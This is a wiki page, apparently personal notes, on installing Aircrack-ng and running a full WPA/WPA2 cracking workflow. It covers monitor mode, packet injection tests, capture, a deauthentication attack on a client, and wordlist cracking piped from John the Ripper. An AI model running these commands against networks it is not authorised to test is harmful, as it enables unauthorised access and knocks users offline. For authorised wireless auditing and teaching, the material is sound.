Aircrack-ng
Jump to navigation
Jump to search
Installation
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng-svn cd aircrack-ng-svn make sudo make install prefix=/opt/aircrack-ng export MANPATH=/opt/aircrack-ng/share/man:$MANPATH
If libgcrypt is installed, we can try to compile with:
port install libgcrypt # Macports yum install libgcrypt-devel # Fedora make gcrypt=true COMMON_CFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"
Note: Please see #1022 ("swap pkh.len when running o a big endian machine") for endianess issues!
Usage
apt-get install iw # This will be needed by some of the Aircrack-ng tools
Enable monitoring mode:
airmon-ng start wlan0
Note that for cracking WPA/WPA2, injection needs to work:
$ aireplay-ng --test wlan0 23:01:00 Trying broadcast probe requests... 23:01:00 Injection is working! 23:01:02 Found 1 AP 23:01:02 Trying directed probe requests... 23:01:02 00:11:22:33:44:55 - channel: 1 - 'Foobar' 23:01:02 Ping (min/avg/max): 1.840ms/19.448ms/37.824ms Power: -35.57 23:01:02 30/30: 100%
OK, injection seems to work. Now, look around your WiFi neighbourhood:
$ airodump-ng wlan0 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -19 100 3468 82803 237 1 54e. WPA2 CCMP PSK Foobar BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 00:22:22:22:22:01 -1 48e- 0 0 31667 00:11:22:33:44:55 00:22:22:22:22:02 -63 54e-54e 0 6291 00:11:22:33:44:55 00:22:22:22:22:03 -68 54e-54e 668 45790
Dump Wifi packets to a file:
airodump-ng -w wlan0.pcap --bssid 00:11:22:33:44:55 --channel 3 wlan0
While airodump-ng is running, generate some packets on the network so that more data is gathered:
aireplay-ng -a 00:11:22:33:44:55 -c 00:22:22:22:22:03 --deauth 1 wlan0
Try to crack with a password file:
aircrack-ng -w /usr/share/dict/words -b 00:11:22:33:44:55 wlan0.pcap
A good password file is crucial for this to succeed. John The Ripper may be of help here:
john --stdout --incremental:all | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap
As there's no way to pause aircrack-ng, we can use JtR's resume feature to continue cracking later on:
john --stdout --incremental:all --session=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap ^C john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap